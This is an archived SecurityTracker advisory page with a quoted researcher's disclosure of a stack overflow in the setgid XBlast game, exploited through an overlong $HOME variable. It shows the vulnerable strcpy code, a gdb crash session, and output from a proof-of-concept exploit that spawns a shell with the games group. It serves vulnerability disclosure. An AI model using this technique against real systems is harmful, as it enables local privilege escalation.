SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   XBlast Vendors:   Vogel, Oliver
XBlast Buffer Overflow in $HOME Variable Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1007252
SecurityTracker URL:  http://securitytracker.com/id/1007252
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 22 2003
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 2.5.10; possibly other versions
Description:   c0wboy of 0x333 Outsiders Security Labs reported a buffer overflow vulnerability in the XBlast game. A local user may be able to gain elevated privileges on the system.

It is reported that a local user can set a specially crafted value for the $HOME enviornment variable to trigger a stack overflow in XBlast. Arbitrary code can be executed.

On systems that have XBlast configured with set group id (setgid) 'games' group privileges, the local user can obtain 'games' group privileges.

A demonstration exploit script is available at:

http://www.0x333.org/exploit/0x333xblast.c

Impact:   A local user can execute arbitrary code on the system, potentially with 'games' group privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  xblast.host.sk/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  *


This is a multi-part message in MIME format.
--------------040909070603070305060100
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit




xblast is affected by stack overflow.
thank you.
c0wboy

--------------040909070603070305060100
Content-Type: text/plain;
 name="outsider-003.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="outsider-003.txt"

           -       0x333 OUTSIDERS SECURITY LABS       -
            -              www.0x333.org              -


~~~ contents ~~~

[0x0] Info
[0x1] Description
[0x2] Vulnerable code
[0x3] Debug session
[0x4] Exploit


[0x0] Info
Author      : c0wboy
Email       : c0wboy@tiscali.it
Date        : 23 July 2003
Advisory    : outsiders-003.txt
Vender URL  : http://xblast.host.sk/
Category    : stackoverflow
OS affected : Linux, Unix


[0x1] Description

"XBlast is a multi-player arcade game for X11R5/R6 (v2.6 or TNT) and
Windows (TNT version only). The game can be played with at least two
players and up to six players. It was inspired by the video/computer
game Bomberman (Dynablaster), which was to my knowledge first programmed
for NEC's PC Engine/Turbo Grafx. Other commercial versions of the origi-
nal game exist for IBM-PC, Atari ST, Amiga [trop cool l'Amiga], NES,
GameBoy and Super NES."

xblast is affected by a stack overflow, that can be triggered by passing a
long $HOME env. I had not the occasion to test if this program is setgided
under some linux distro, but we can assume that it is +s games group. The
PoC exploit will spawn a shell with gid=20(games).


[0x2] Vulnerable code

In setup.c we found :

/*
 * local function list_setups
 */
#ifdef __STDC__
static char *
list_setups (void)
#else
static char *
list_setups ()
#endif
{
  char path[1024];
  char *result = NULL;
  char *home;
  DIR *dp;
  struct dirent *dirp;

  /* set path to setup dir */
  path[0] = '\0';
  if (NULL != (home = getenv("HOME") ) ) {
    strcpy(path, home);
  }
  strcat(path, file_setup_dir);


We have found an unchecked strcpy().


[0x3] Debug session

[root@0x333 c0wboy]# export HOME=`perl -e "print 'A' x 1337"`
[root@0x333 c0wboy]# gdb /usr/X11R6/bin/xblast
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols
found)...
(gdb) r
Starting program: /usr/X11R6/bin/xblast
(no debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...
(no debugging symbols found)...XBlast 2.5.10 Sound BETA Copyright (c) 1993-97
Oliver Vogel
Report any bugs to: vogel@ikp.uni-koeln.de
XBlast - Interactive Setup
(no debugging symbols found)...Load an old setup (y/n): y
/usr/X11R6/bin/xblast: Failed to read directory
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA/.xblast-setups.
 
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0x0      0
ecx            0x808a880        134785152
edx            0x57a    1402
ebx            0xbffff5ed       -1073744403
esp            0xbfffdcb8       0xbfffdcb8
ebp            0x41414141       0x41414141
esi            0x1      1
edi            0x8049fbc        134520764
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb)

As we can see, we can control the flow of the process, by changing the
value of the ret-address.


[0x4] Exploit

A proof-of-concept exploit is available @ :

http://www.0x333.org/exploit/0x333xblast.c

[c0wboy@0x333 c0wboy]$ gcc 0x333xblast.c -o xblast
[c0wboy@0x333 c0wboy]$ ./xblast
 
 
 ---       xblast local exploit by c0wboy      ---
 --- Outsiders Se(c)urity Labs / www.0x333.org ---
 
 [NOW PRESS 'y' TO SPAWN THE SHELL]
 
XBlast 2.5.10 Sound BETA Copyright (c) 1993-97 Oliver Vogel
Report any bugs to: vogel@ikp.uni-koeln.de
XBlast - Interactive Setup
Load an old setup (y/n): y
			/usr/X11R6/bin/xblast: Failed to read directory ??????????????????
????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1?1?1ɳ??G̀1?Rhn/shh
//bi??RS???B?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8???8??
?????!?`?/.xblast-setups.
sh-2.05b$ id
uid=500(c0wboy) gid=20(games) groups=500(c0wboy)
sh-2.05b$

EOF

--------------040909070603070305060100--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC